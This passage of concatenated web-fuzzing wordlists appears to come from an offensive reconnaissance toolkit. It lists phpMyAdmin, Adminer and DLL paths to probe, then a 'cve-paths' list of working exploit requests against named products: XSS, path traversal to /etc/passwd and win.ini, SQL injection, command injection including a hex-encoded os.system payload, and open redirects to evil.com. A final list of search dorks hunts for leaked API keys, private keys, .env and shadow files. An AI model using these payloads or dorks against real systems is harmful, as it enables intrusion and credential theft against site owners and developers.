/phpMyAdminold/ 186 | /phpMyAdmins/ 187 | /sql/myadmin/ 188 | /sql/php-myadmin/ 189 | /sql/phpmyadmin2/ 190 | /sql/phpmyadmin3/ 191 | /sql/phpmyadmin4/ 192 | /tools/phpMyAdmin/ 193 | /typo3/phpmyadmin/ 194 | /usr/share/phpmyadmin/ 195 | /web/phpmyadmin/ 196 | /wp-phpmyadmin/ 197 | /wp-phpmyadmin/phpmyadmin/ 198 | /www/phpMyAdmin/ 199 | /xampp/phpmyadmin/ 200 | -------------------------------------------------------------------------------- /adminer.txt: -------------------------------------------------------------------------------- 1 | /adminer 2 | /adminer-3.0.0-en.php 3 | /adminer-3.0.0-mysql-cs.php 4 | /adminer-3.0.0-mysql.php 5 | /adminer-3.0.1-en.php 6 | /adminer-3.0.1-mysql-en.php 7 | /adminer-3.0.1-mysql.php 8 | /adminer-3.1.0-cs.php 9 | /adminer-3.1.0-en.php 10 | /adminer-3.1.0-mysql-en.php 11 | /adminer-3.1.0-mysql.php 12 | /adminer-3.2.0-cs.php 13 | /adminer-3.2.0-mysql-cs.php 14 | /adminer-3.2.0-mysql-en.php 15 | /adminer-3.2.0-mysql.php 16 | /adminer-3.2.1-en.php 17 | /adminer-3.2.1-mysql-cs.php 18 | /adminer-3.2.1-mysql-en.php 19 | /adminer-3.2.1-mysql.php 20 | /adminer-3.2.1.php 21 | /adminer-3.2.2-cs.php 22 | /adminer-3.2.2-mysql-cs.php 23 | /adminer-3.2.2-mysql.php 24 | /adminer-3.2.2.php 25 | /adminer-3.3.0-cs.php 26 | /adminer-3.3.0-en.php 27 | /adminer-3.3.0-mysql-en.php 28 | /adminer-3.3.0-mysql.php 29 | /adminer-3.3.1-cs.php 30 | /adminer-3.3.1-en.php 31 | /adminer-3.3.1-mysql-en.php 32 | /adminer-3.3.1-mysql.php 33 | /adminer-3.3.2-cs.php 34 | /adminer-3.3.2-en.php 35 | /adminer-3.3.2-mysql-en.php 36 | /adminer-3.3.2.php 37 | /adminer-3.3.3-en.php 38 | /adminer-3.3.3-mysql-en.php 39 | /adminer-3.3.3-mysql.php 40 | /adminer-3.3.3.php 41 | /adminer-3.3.4-en.php 42 | /adminer-3.3.4-mysql-en.php 43 | /adminer-3.3.4.php 44 | /adminer-3.4.0-en.php 45 | /adminer-3.4.0-mysql-en.php 46 | /adminer-3.4.0-mysql.php 47 | /adminer-3.5.0-cs.php 48 | /adminer-3.5.0-en.php 49 | /adminer-3.5.0-mysql-en.php 50 | /adminer-3.5.0-mysql.php 51 | /adminer-3.5.0.php 52 | /adminer-3.5.1-en.php 53 | /adminer-3.5.1-mysql-cs.php 54 | /adminer-3.5.1-mysql.php 55 | /adminer-3.5.1.php 56 | /adminer-3.6.0-cs.php 57 | /adminer-3.6.0-en.php 58 | /adminer-3.6.0-mysql-cs.php 59 | /adminer-3.6.0-mysql.php 60 | /adminer-3.6.1-cs.php 61 | /adminer-3.6.1-mysql-cs.php 62 | /adminer-3.6.1-mysql-en.php 63 | /adminer-3.6.1-mysql.php 64 | /adminer-3.6.2-cs.php 65 | /adminer-3.6.2-mysql-cs.php 66 | /adminer-3.6.2-mysql-en.php 67 | /adminer-3.6.2-mysql.php 68 | /adminer-3.6.3-cs.php 69 | /adminer-3.6.3-mysql-cs.php 70 | /adminer-3.6.3-mysql-en.php 71 | /adminer-3.6.3.php 72 | /adminer-3.6.4-cs.php 73 | /adminer-3.6.4-en.php 74 | /adminer-3.6.4-mysql.php 75 | /adminer-3.7.0-cs.php 76 | /adminer-3.7.0-en.php 77 | /adminer-3.7.0-mysql-cs.php 78 | /adminer-3.7.0-mysql.php 79 | /adminer-3.7.0.php 80 | /adminer-3.7.1-en.php 81 | /adminer-3.7.1-mysql-en.php 82 | /adminer-3.7.1.php 83 | /adminer-4.0.0-cs.php 84 | /adminer-4.0.0-mysql-cs.php 85 | /adminer-4.0.0-mysql.php 86 | /adminer-4.0.0.php 87 | /adminer-4.0.1-en.php 88 | /adminer-4.0.1-mysql-en.php 89 | /adminer-4.0.1-mysql.php 90 | /adminer-4.0.1.php 91 | /adminer-4.0.2-cs.php 92 | /adminer-4.0.2-mysql-cs.php 93 | /adminer-4.0.2-mysql-en.php 94 | /adminer-4.0.2-mysql.php 95 | /adminer-4.0.2.php 96 | /adminer-4.0.3-en.php 97 | /adminer-4.0.3-mysql-cs.php 98 | /adminer-4.0.3-mysql.php 99 | /adminer-4.1.0-cs.php 100 | /adminer-4.1.0-mysql-cs.php 101 | /adminer-4.1.0-mysql.php 102 | /adminer-4.1.0.php 103 | /adminer-4.2.0-cs.php 104 | /adminer-4.2.0-en.php 105 | /adminer-4.2.0-mysql-en.php 106 | /adminer-4.2.0-mysql.php 107 | /adminer-4.2.0.php 108 | /adminer-4.2.1-cs.php 109 | /adminer-4.2.1-en.php 110 | /adminer-4.2.1.php 111 | /adminer-4.2.2-en.php 112 | /adminer-4.2.2-mysql-cs.php 113 | /adminer-4.2.2-mysql.php 114 | /adminer-4.2.3-cs.php 115 | /adminer-4.2.3-en.php 116 | /adminer-4.2.3-mysql.php 117 | /adminer-4.2.4-en.php 118 | /adminer-4.2.4-mysql-cs.php 119 | /adminer-4.2.4-mysql-en.php 120 | /adminer-4.2.4-mysql.php 121 | /adminer-4.2.4.php 122 | /adminer-4.2.5-cs.php 123 | /adminer-4.2.5-mysql-cs.php 124 | /adminer-4.2.5-mysql-en.php 125 | /adminer-4.2.5.php 126 | /adminer-4.3.0-cs.php 127 | /adminer-4.3.0-en.php 128 | /adminer-4.3.0-mysql-en.php 129 | /adminer-4.3.0-mysql.php 130 | /adminer-4.3.1-cs.php 131 | /adminer-4.3.1-en.php 132 | /adminer-4.3.1-mysql-en.php 133 | /adminer-4.3.1-mysql.php 134 | /adminer-4.3.1.php 135 | /adminer-4.4.0-en.php 136 | /adminer-4.4.0-mysql-en.php 137 | /adminer-4.4.0-mysql.php 138 | /adminer-4.4.0.php 139 | /adminer-4.5.0-cs.php 140 | /adminer-4.5.0-mysql-cs.php 141 | /adminer-4.5.0-mysql.php 142 | /adminer-4.6.0-cs.php 143 | /adminer-4.6.0-en.php 144 | /adminer-4.6.0-mysql-cs.php 145 | /adminer-4.6.0-mysql.php 146 | /adminer-4.6.0.php 147 | /adminer-4.6.1-cs.php 148 | /adminer-4.6.1-mysql-cs.php 149 | /adminer-4.6.1-mysql.php 150 | /adminer-4.6.1.php 151 | /adminer-4.6.2-en.php 152 | /adminer-4.6.2-mysql-en.php 153 | /adminer-4.6.2.php 154 | /adminer-4.6.3-cs.php 155 | /adminer-4.6.3-en.php 156 | /adminer-4.6.3-mysql-en.php 157 | /adminer-4.6.3-mysql.php 158 | /adminer-4.7.0-cs.php 159 | /adminer-4.7.0-mysql-cs.php 160 | /adminer-4.7.0-mysql.php 161 | /adminer-4.7.1-cs.php 162 | /adminer-4.7.1-mysql-cs.php 163 | /adminer-4.7.1-mysql.php 164 | /adminer-4.7.2-cs.php 165 | /adminer-4.7.2-en.php 166 | /adminer-4.7.2-mysql-en.php 167 | /adminer-4.7.2-mysql.php 168 | /adminer-4.7.2.php 169 | /adminer-4.7.3-en.php 170 | /adminer-4.7.3-mysql-en.php 171 | /adminer-4.7.3-mysql.php 172 | /adminer.php 173 | /wp-content/adminer.php 174 | /wp-content/plugins/adminer/inc/editor/index.php 175 | /wp-content/uploads/adminer.php 176 | /adminer/ 177 | /_adminer.php 178 | /mirasvit_adminer_mysql.php 179 | /mirasvit_adminer_425.php 180 | /adminer/index.php 181 | /adminer1.php 182 | /mirasvit_adminer_431.php 183 | /mirasvit_adminer-4.2.3.php 184 | /adminer-4.6.2-cs.php 185 | /adminer-4.5.0.php 186 | /adminer-4.3.0.php 187 | /latest.php 188 | /latest-en.php 189 | /latest-mysql.php 190 | /latest-mysql-en.php 191 | /adminer-4.7.5.php 192 | /adminer-4.7.5-en.php 193 | /adminer-4.7.5-mysql.php 194 | /adminer-4.7.5-mysql-en.php 195 | -------------------------------------------------------------------------------- /dll_files.txt: -------------------------------------------------------------------------------- 1 | agent.dll 2 | %appdata%/microsoft/objframe.dll 3 | %appdata%/microsoft/shmgr.dll 4 | bin/AjaxControlToolkit.dll 5 | bin/AjaxMin.dll 6 | bin/CMS.Blogs.dll 7 | bin/CMS.CKEditor.dll 8 | bin/CMS.CMSHelper.dll 9 | bin/CMS.CMSSiteMapProvider.dll 10 | bin/CMS.CMSStorage.dll 11 | bin/CMS.Community.dll 12 | bin/CMS.Controls.dll 13 | bin/CMS.Controls.XmlSerializers.dll 14 | bin/CMS.DatabaseHelper.dll 15 | bin/CMS.DataEngine.dll 16 | bin/CMS.DataProviderSQL.dll 17 | bin/CMS.EmailEngine.dll 18 | bin/CMS.EventLog.dll 19 | bin/CMS.ExtendedControls.dll 20 | bin/CMS.FormControls.dll 21 | bin/CMS.FormEngine.dll 22 | bin/CMS.Forums.dll 23 | bin/CMS.GlobalEventHelper.dll 24 | bin/CMS.GlobalHelper.dll 25 | bin/CMS.ImportExport.dll 26 | bin/CMS.IO.dll 27 | bin/CMS.ISearchEngine.dll 28 | bin/CMS.LicenseProvider.dll 29 | bin/CMS.LicenseProvider.XmlSerializers.dll 30 | bin/CMS.MediaLibrary.dll 31 | bin/CMS.MembershipProvider.dll 32 | bin/CMS.MessageBoard.dll 33 | bin/CMS.Messaging.dll 34 | bin/CMS.MetaWeblogProvider.dll 35 | bin/CMS.Newsletter.dll 36 | bin/CMS.Notifications.dll 37 | bin/CMS.OnlineMarketing.dll 38 | bin/CMS.OutputFilter.dll 39 | bin/CMS.Polls.dll 40 | bin/CMS.PortalControls.dll 41 | bin/CMS.PortalEngine.dll 42 | bin/CMS.ProjectManagement.dll 43 | bin/CMS.Reporting.dll 44 | bin/CMS.ResourceManager.dll 45 | bin/CMS.RESTService.dll 46 | bin/CMS.Scheduler.dll 47 | bin/CMS.SearchProviderSQL.dll 48 | bin/CMS.SettingsProvider.dll 49 | bin/CMS.SiteProvider.dll 50 | bin/CMS.skmMenuControl.dll 51 | bin/CMS.Synchronization.dll 52 | bin/CMS.SynchronizationEngine.dll 53 | bin/CMS.TreeEngine.dll 54 | bin/CMS.UIControls.dll 55 | bin/CMS.URLRewritingEngine.dll 56 | bin/CMS.VirtualPathHelper.dll 57 | bin/CMS.VirtualPathProvider.dll 58 | bin/CMS.WebAnalytics.dll 59 | bin/CMS.WebFarmSync.dll 60 | bin/CMS.WebFarmSyncHelper.dll 61 | bin/CMS.WinServiceEngine.dll 62 | bin/CMS.WorkflowEngine.dll 63 | bin/CMS.ZipUtilities.dll 64 | bin/CookComputing.XmlRpcV2.dll 65 | bin/DocumentFormat.OpenXml.dll 66 | bin/ICSharpCode.SharpZipLib.dll 67 | bin/Lucene.Net.dll 68 | bin/NetSpell.SpellChecker.dll 69 | bin/OpenPop.dll 70 | bin/RadApi.dll 71 | bin/System.Web.Mvc.dll 72 | bin/System.Web.Routing.dll 73 | bin/WebInstallerHelper.dll 74 | borlndmm.dll 75 | carbo.dll 76 | cc32100mt.dll 77 | cdllait32.dll 78 | cdllait64.dll 79 | cdlluninstallsgh32.dll 80 | cdlluninstallsgh64.dll 81 | cdlluninstallws32.dll 82 | cdlluninstallws64.dll 83 | cgi-bin/foxweb.dll 84 | cgi-bin/gx.dll 85 | cgi-bin/shtml.dll 86 | cgi-bin/wconsole.dll 87 | d3dx3xd.dll 88 | default.dll 89 | .dll 90 | feedback.dll 91 | fpadmdll.dll 92 | fr/FspConfigWizard.Resources.dll 93 | fr/Microsoft.IdentityServer.ClaimsPolicy.Resources.dll 94 | fr/Microsoft.IdentityServer.Dkm.Resources.dll 95 | fr/Microsoft.IdentityServer.Powershell.Resources.dll 96 | fr/Microsoft.IdentityServer.Resources.dll 97 | fr/Microsoft.IdentityServer.Service.Resources.dll 98 | fr/Microsoft.IdentityServer.UI.Shared.Resources.dll 99 | image.dll 100 | isapi/tstisapi.dll 101 | Lib/AjaxControlToolkit.dll 102 | Lib/AjaxMin.dll 103 | Lib/CookComputing.XmlRpcV2.dll 104 | Lib/DotNetOpenAuth.dll 105 | Lib/ICSharpCode.SharpZipLib.dll 106 | Lib/ITHit.WebDAV.Server.dll 107 | Lib/Lucene.Net.dll 108 | Lib/Microsoft.Web.Services3.dll 109 | Lib/NetSpell.SpellChecker.dll 110 | Lib/OpenPop.dll 111 | logonsecurity.dll 112 | LogonSecurity.dll 113 | mdairsync.dll 114 | MDAirSync.dll 115 | mdbis.dll 116 | MDBis.dll 117 | mdsyncml.dll 118 | MDSyncML.dll 119 | MetroControls.dll 120 | Microsoft.IdentityServer.ClaimsPolicy.dll 121 | Microsoft.IdentityServer.Compression.dll 122 | Microsoft.IdentityServer.Dkm.dll 123 | Microsoft.IdentityServer.dll 124 | Microsoft.IdentityServer.NativeResources.dll 125 | Microsoft.IdentityServer.Powershell.dll 126 | Microsoft.IdentityServer.Service.dll 127 | Microsoft.IdentityServer.UI.Shared.dll 128 | Mister PiX version.dll 129 | Mono.Cecil.dll 130 | msadc/msadcs.dll 131 | om.dll 132 | pbcsad.dll 133 | pbcs.dll 134 | pbcsedit.dll 135 | pbcsi.dll 136 | php5ts.dll 137 | php_gmp.dll 138 | php_mbstring.dll 139 | php/php4ts.dll 140 | php_sockets.dll 141 | QtGui4.dll 142 | rightfax/fuwww.dll 143 | rs_client.dll 144 | rub.dll 145 | scripts/Carello/Carello.dll 146 | scripts/cphost.dll 147 | scripts/cpshost.dll 148 | scripts/emurl/RECMAN.dll 149 | scripts/httpodbc.dll 150 | scripts/iisadmin/ism.dll 151 | scripts/proxy/w3proxy.dll 152 | scripts/slxweb.dll 153 | scripts/tradecli.dll 154 | scripts/wsisa.dll 155 | shell32.dll 156 | shop.dll 157 | Site/biztalkhttpreceive.dll 158 | SqmApi.dll 159 | streetmap.dll 160 | system32.dll 161 | %system%/cdgext32.dll 162 | %system%/cfgbkmgrs.dll 163 | %system%/cfgmgr64.dll 164 | %system%/comsvrpcs.dll 165 | %system%/d3dx8_20.dll 166 | %system%/dllcomm.dll 167 | %system%/FFExtendedCommand.dll 168 | %system%/gpktcsp32.dll 169 | %system%/mdwmnsp.dll 170 | %system%/objframe.dll 171 | %system%/rpcdist.dll 172 | %system%/scsvrft.dll 173 | %system%/sdptbw.dll 174 | %system%/shlink32.dll 175 | %system%/shlink64.dll 176 | %system%/skypeie6plugin.dll 177 | %system%/slbkbw.dll 178 | %system%/wmspdmgr.dll 179 | test.dll 180 | vba332.dll 181 | _vti_adm/admin.dll 182 | _vti_bin/_vti_adm/Admin.dll 183 | _vti_bin/_vti_aut/Author.dll 184 | _vti_pvt/shtml.dll 185 | wallhack.dll 186 | wc.dll 187 | webobjects.dll 188 | WebObjects.dll 189 | windows/cdgext32.dll 190 | windows/cfgbkmgrs.dll 191 | windows/cfgmgr64.dll 192 | windows/comsvrpcs.dll 193 | windows/d3dx8_20.dll 194 | windows/dllcomm.dll 195 | windows/FFExtendedCommand.dll 196 | windows/gpktcsp32.dll 197 | windows/mdwmnsp.dll 198 | windows/objframe.dll 199 | windows/rpcdist.dll 200 | windows/scsvrft.dll 201 | windows/sdptbw.dll 202 | windows/shlink32.dll 203 | windows/shlink64.dll 204 | windows/skypeie6plugin.dll 205 | windows/slbkbw.dll 206 | windows/wmspdmgr.dll 207 | wing32.dll 208 | wwww.dll 209 | -------------------------------------------------------------------------------- /cve-paths.txt: -------------------------------------------------------------------------------- 1 | /cgi 2 | /test.cgi 3 | /debug.cgi 4 | /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E 5 | /verify.php?id=1&confirm_hash= 6 | /mantis/verify.php?id=1&confirm_hash= 7 | /mantisBT/verify.php?id=1&confirm_hash= 8 | /bugs/verify.php?confirm_hash=&id=1 9 | /static/../../../a/../../../../etc/passwd 10 | /sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit 11 | /vendor/phpunit/phpunit/phpunit 12 | /api/vendor/phpunit/phpunit/phpunit 13 | /apps/vendor/phpunit/phpunit/phpunit 14 | /backup/vendor/phpunit/phpunit/phpunit 15 | /oldsite/vendor/phpunit/phpunit/phpunit 16 | /lib/phpunit/phpunit/phpunit 17 | /modules/vendor/phpunit/phpunit/phpunit 18 | /old/vendor/phpunit/phpunit/phpunit 19 | /zend/vendor/phpunit/phpunit/phpunit 20 | /yii/vendor/phpunit/phpunit/phpunit 21 | /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent( 22 | /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent( 23 | /plugins/servlet/oauth/users/icon 24 | /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 25 | /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd 26 | /web/static/c 27 | /base/static/c 28 | /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini 29 | /debug/pprof/ 30 | /plugin/build 31 | /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true 32 | //secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search 33 | /getFavicon?host=burpcollaborator.net 34 | /wp 35 | /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 36 | /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd 37 | /mobile/error 38 | /INF/maven/com.atlassian.jira/atlassian 39 | /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd 40 | /sell 41 | /api/snapshots 42 | /secure/ContactAdministrators!default.jspa 43 | /zabbix.php?action=dashboard.view&dashboardid=1 44 | /webapp/?fccc0\>5f43d=1 45 | /data/autosuggest 46 | /admin/data/autosuggest 47 | /vpn/../vpns/cfg/smb.conf 48 | /share/page/dologin 49 | /Login?!> 79 | /proxy.stream?origin=http 80 | /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; 81 | /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 82 | /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS 83 | /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 84 | /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test 85 | /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 86 | /index.php?redirect=/\/evil.com/ 87 | /index.php?redirect=//evil.com 88 | /api/config 89 | /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd 90 | /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 91 | /version.web 92 | /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 93 | /webadmin/out 94 | /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s 95 | /www/delivery/afr.php?refresh=10000&\),10000000);alert(1337);setTimeout(alert(\ 96 | /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 97 | /secure/QueryComponent!Default.jspa 98 | /run 99 | /secure/ViewUserHover.jspa 100 | /extdirect 101 | /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 102 | /os/mxperson 103 | /meaweb/os/mxperson 104 | /rest/beta/repositories/go/group 105 | /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc 106 | /nuxeo/login.jsp/pwn${31333333330+7}.xhtml 107 | /pages/includes/status 108 | /assets/file 109 | /message?title=x&msg=%26%23 110 | /jkstatus 111 | /jkstatus; 112 | /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f 113 | /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) 114 | /anchor/errors.log 115 | /filemanager/upload.php 116 | /servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError 117 | /IMS 118 | /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini 119 | /spring 120 | /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 121 | /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 122 | /jolokia/read?mimeType=text/html 123 | /api/jolokia/read?mimeType=text/html 124 | /names.nsf/People?OpenView 125 | -------------------------------------------------------------------------------- /all-gitdorks.txt: -------------------------------------------------------------------------------- 1 | .mlab.com password 2 | WFClient Password extension:ica 3 | access_key 4 | access_token 5 | admin_pass 6 | admin_user 7 | algolia_admin_key 8 | algolia_api_key 9 | alias_pass 10 | alicloud_access_key 11 | amazon_secret_access_key 12 | amazonaws 13 | ansible_vault_password 14 | aos_key 15 | api_key 16 | api_key_secret 17 | api_key_sid 18 | api_secret 19 | api.googlemaps AIza 20 | apidocs 21 | apikey 22 | apiSecret 23 | app_debug 24 | app_id 25 | app_key 26 | app_log_level 27 | app_secret 28 | appkey 29 | appkeysecret 30 | application_key 31 | appsecret 32 | appspot 33 | auth_token 34 | authorizationToken 35 | authsecret 36 | aws_access 37 | aws_access_key_id 38 | aws_bucket 39 | aws_key 40 | aws_secret 41 | aws_secret_key 42 | aws_token 43 | AWSSecretKey 44 | b2_app_key 45 | bashrc password 46 | bintray_apikey 47 | bintray_gpg_password 48 | bintray_key 49 | bintraykey 50 | bluemix_api_key 51 | bluemix_pass 52 | browserstack_access_key 53 | bucket_password 54 | bucketeer_aws_access_key_id 55 | bucketeer_aws_secret_access_key 56 | built_branch_deploy_key 57 | bx_password 58 | cache_driver 59 | cache_s3_secret_key 60 | cattle_access_key 61 | cattle_secret_key 62 | certificate_password 63 | ci_deploy_password 64 | client_secret 65 | client_zpk_secret_key 66 | clojars_password 67 | cloud_api_key 68 | cloud_watch_aws_access_key 69 | cloudant_password 70 | cloudflare_api_key 71 | cloudflare_auth_key 72 | cloudinary_api_secret 73 | cloudinary_name 74 | codecov_token 75 | config 76 | conn.login 77 | connectionstring 78 | consumer_key 79 | consumer_secret 80 | credentials 81 | cypress_record_key 82 | database_password 83 | database_schema_test 84 | datadog_api_key 85 | datadog_app_key 86 | db_password 87 | db_server 88 | db_username 89 | dbpasswd 90 | dbpassword 91 | dbuser 92 | deploy_password 93 | digitalocean_ssh_key_body 94 | digitalocean_ssh_key_ids 95 | docker_hub_password 96 | docker_key 97 | docker_pass 98 | docker_passwd 99 | docker_password 100 | dockerhub_password 101 | dockerhubpassword 102 | dot-files 103 | dotfiles 104 | droplet_travis_password 105 | dynamoaccesskeyid 106 | dynamosecretaccesskey 107 | elastica_host 108 | elastica_port 109 | elasticsearch_password 110 | encryption_key 111 | encryption_password 112 | env.heroku_api_key 113 | env.sonatype_password 114 | eureka.awssecretkey 115 | extension:avastlic support.avast.com 116 | extension:bat 117 | extension:cfg 118 | extension:dbeaver-data-sources.xml 119 | extension:env 120 | extension:exs 121 | extension:ini 122 | extension:json api.forecast.io 123 | extension:json googleusercontent client_secret 124 | extension:json mongolab.com 125 | extension:pem 126 | extension:pem private 127 | extension:ppk 128 | extension:ppk private 129 | extension:properties 130 | extension:sh 131 | extension:sls 132 | extension:sql 133 | extension:sql mysql dump 134 | extension:sql mysql dump password 135 | extension:yaml mongolab.com 136 | extension:zsh 137 | fabricApiSecret 138 | facebook_secret 139 | fb_secret 140 | filename:_netrc password 141 | filename:.bash_history 142 | filename:.bash_profile aws 143 | filename:.bashrc mailchimp 144 | filename:.bashrc password 145 | filename:.cshrc 146 | filename:.dockercfg auth 147 | filename:.env DB_USERNAME NOT homestead 148 | filename:.env MAIL_HOSTsmtp.gmail.com 149 | filename:.esmtprc password 150 | filename:.ftpconfig 151 | filename:.git-credentials 152 | filename:.history 153 | filename:.htpasswd 154 | filename:.netrc password 155 | filename:.npmrc _auth 156 | filename:.pgpass 157 | filename:.remote-sync.json 158 | filename:.s3cfg 159 | filename:.sh_history 160 | filename:.tugboat NOT _tugboat 161 | filename:bash 162 | filename:bash_history 163 | filename:bash_profile 164 | filename:bashrc 165 | filename:beanstalkd.yml 166 | filename:CCCam.cfg 167 | filename:composer.json 168 | filename:config 169 | filename:config irc_pass 170 | filename:config.json auths 171 | filename:config.php dbpasswd 172 | filename:configuration.php JConfig password 173 | filename:connections 174 | filename:connections.xml 175 | filename:constants 176 | filename:credentials 177 | filename:credentials aws_access_key_id 178 | filename:cshrc 179 | filename:database 180 | filename:dbeaver-data-sources.xml 181 | filename:deploy.rake 182 | filename:deployment-config.json 183 | filename:dhcpd.conf 184 | filename:dockercfg 185 | filename:env 186 | filename:environment 187 | filename:express.conf 188 | filename:express.conf path:.openshift 189 | filename:filezilla.xml 190 | filename:filezilla.xml Pass 191 | filename:git-credentials 192 | filename:gitconfig 193 | filename:global 194 | filename:history 195 | filename:htpasswd 196 | filename:hub oauth_token 197 | filename:id_dsa 198 | filename:id_rsa 199 | filename:id_rsa or filename:id_dsa 200 | filename:idea14.key 201 | filename:known_hosts 202 | filename:logins.json 203 | filename:makefile 204 | filename:master.key path:config 205 | filename:netrc 206 | filename:npmrc 207 | filename:pass 208 | filename:passwd path:etc 209 | filename:pgpass 210 | filename:prod.exs 211 | filename:prod.exs NOT prod.secret.exs 212 | filename:prod.secret.exs 213 | filename:proftpdpasswd 214 | filename:recentservers.xml 215 | filename:recentservers.xml Pass 216 | filename:robomongo.json 217 | filename:s3cfg 218 | filename:secrets.yml password 219 | filename:server.cfg 220 | filename:server.cfg rcon password 221 | filename:settings 222 | filename:settings.py SECRET_KEY 223 | filename:sftp-config.json 224 | filename:sftp.json path:.vscode 225 | filename:shadow 226 | filename:shadow path:etc 227 | filename:spec 228 | filename:sshd_config 229 | filename:tugboat 230 | filename:ventrilo_srv.ini 231 | filename:WebServers.xml 232 | filename:wp-config 233 | filename:wp-config.php 234 | filename:zhrc 235 | firebase 236 | flickr_api_key 237 | fossa_api_key 238 | ftp 239 | ftp_password 240 | gatsby_wordpress_base_url 241 | gatsby_wordpress_client_id 242 | gatsby_wordpress_user 243 | gh_api_key 244 | gh_token 245 | ghost_api_key 246 | github_api_key 247 | github_deploy_hb_doc_pass 248 | github_id 249 | github_key 250 | github_password 251 | github_token 252 | gitlab 253 | gmail_password 254 | gmail_username 255 | google_maps_api_key 256 | google_private_key 257 | google_secret 258 | google_server_key 259 | gpg_key_name 260 | gpg_keyname 261 | gpg_passphrase 262 | HEROKU_API_KEY language:json 263 | HEROKU_API_KEY language:shell 264 | heroku_oauth 265 | heroku_oauth_secret 266 | heroku_oauth_token 267 | heroku_secret 268 | heroku_secret_token 269 | herokuapp 270 | HOMEBREW_GITHUB_API_TOKEN language:shell 271 | htaccess_pass 272 | htaccess_user 273 | incident_channel_name 274 | internal 275 | irc_pass 276 | JEKYLL_GITHUB_TOKEN 277 | jsforce extension:js conn.login 278 | jwt_client_secret_key 279 | jwt_lookup_secert_key 280 | jwt_password 281 | jwt_secret 282 | jwt_secret_key 283 | jwt_token 284 | jwt_user 285 | jwt_web_secert_key 286 | jwt_xmpp_secert_key 287 | key 288 | keyPassword 289 | language:yaml -filename:travis 290 | ldap_password 291 | ldap_username 292 | linux_signing_key 293 | ll_shared_key 294 | location_protocol 295 | log_channel 296 | login 297 | lottie_happo_api_key 298 | lottie_happo_secret_key 299 | lottie_s3_api_key 300 | lottie_s3_secret_key 301 | magento password 302 | mail_password 303 | mail_port 304 | mailchimp 305 | mailchimp_api_key 306 | mailchimp_key 307 | mailgun 308 | mailgun apikey 309 | mailgun_key 310 | mailgun_password 311 | mailgun_priv_key 312 | mailgun_secret_api_key 313 | manage_key 314 | mandrill_api_key 315 | mapbox api key 316 | master_key 317 | 